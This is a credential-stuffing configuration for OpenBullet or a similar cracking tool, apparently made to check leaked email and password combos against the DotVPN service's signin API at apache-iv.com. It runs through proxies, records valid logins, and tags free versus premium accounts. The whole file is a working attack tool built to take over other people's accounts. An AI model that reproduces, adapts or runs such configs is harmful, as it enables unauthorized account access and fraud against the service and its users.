[SETTINGS]
{
  "Name": "DotVPN",
  "SuggestedBots": 30,
  "MaxCPM": 0,
  "LastModified": "2020-09-04T15:54:12.52269+04:30",
  "AdditionalInfo": "",
  "Author": "\"The_FiendQQ\"",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "Credentials",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#Length FUNCTION Length "{\"email\":\"<USER>\"}" -> VAR "Length" 

#LoginEmail REQUEST POST "https://apache-iv.com/3/user/check" 
  CONTENT "{\"email\":\"<USER>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: application/json" 
  HEADER "Host: apache-iv.com" 
  HEADER "Connection: Keep-Alive" 
  HEADER "Content-Length: <Length>" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "{\"code\":3,\"name\":\"\"}" 
    KEY "{\"code\":3" 
  KEYCHAIN Failure OR 
    KEY "{\"code\":0}" 

#Length FUNCTION Length "{\"email\":\"<USER>\",\"passwd\":\"<PASS>\"}" -> VAR "Ln2" 

#Login REQUEST POST "https://apache-iv.com/3/user/signin" 
  CONTENT "{\"email\":\"<USER>\",\"passwd\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: application/json" 
  HEADER "Host: apache-iv.com" 
  HEADER "Connection: Keep-Alive" 
  HEADER "Content-Length: <Ln2>" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "{\"code\":2}" 
  KEYCHAIN Success OR 
    KEY "{\"code\":0,\"udid" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "FREE" OR 
    KEY "{\"premium\":0" 

